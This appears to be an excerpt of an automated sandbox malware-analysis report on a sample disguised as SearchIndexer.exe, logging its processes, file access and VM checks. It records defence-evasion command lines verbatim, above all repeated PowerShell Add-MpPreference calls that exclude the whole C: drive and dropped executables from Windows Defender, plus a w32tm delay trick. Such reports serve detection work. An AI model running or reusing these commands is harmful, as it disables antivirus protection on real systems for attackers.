Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Thread delayed: delay time: 30000
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Thread delayed: delay time: 3600000
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Thread delayed: delay time: 300000
Source: C:\Program Files (x86)\Windows NT\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\SearchIndexer.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\Config\	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\GatherLogs\	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\	Jump to behavior

Source: SearchIndexer.exe, 00000001.00000002.2465672330.000000001C081000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_
Source: w32tm.exe, 0000002E.00000002.1945805528.0000015A56597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
Source: SearchIndexer.exe, 00000001.00000002.2465672330.000000001C081000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\Y1}0

Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows NT\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\SearchIndexer.exe'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Provisioning\Packages\tAVtSoJGTaCxrZiXcJn.exe'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows multimedia platform\tAVtSoJGTaCxrZiXcJn.exe'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\SearchIndexer.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Provisioning\Packages\tAVtSoJGTaCxrZiXcJn.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows multimedia platform\tAVtSoJGTaCxrZiXcJn.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe'	Jump to behavior

Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)

Source: C:\Users\user\Desktop\SearchIndexer.exe

File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe

Jump to dropped file

Source: C:\Users\user\Desktop\SearchIndexer.exe	Process created: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe "C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qhmtfwmp\qhmtfwmp.cmdline"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\SearchIndexer.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Provisioning\Packages\tAVtSoJGTaCxrZiXcJn.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows multimedia platform\tAVtSoJGTaCxrZiXcJn.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3vTESgZFSf.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF5B1.tmp" "c:\Windows\System32\CSC8B0546412F3A4425A5D7AA169F4D63A4.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Windows NT\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe "C:\Program Files (x86)\windows nt\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe"

Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
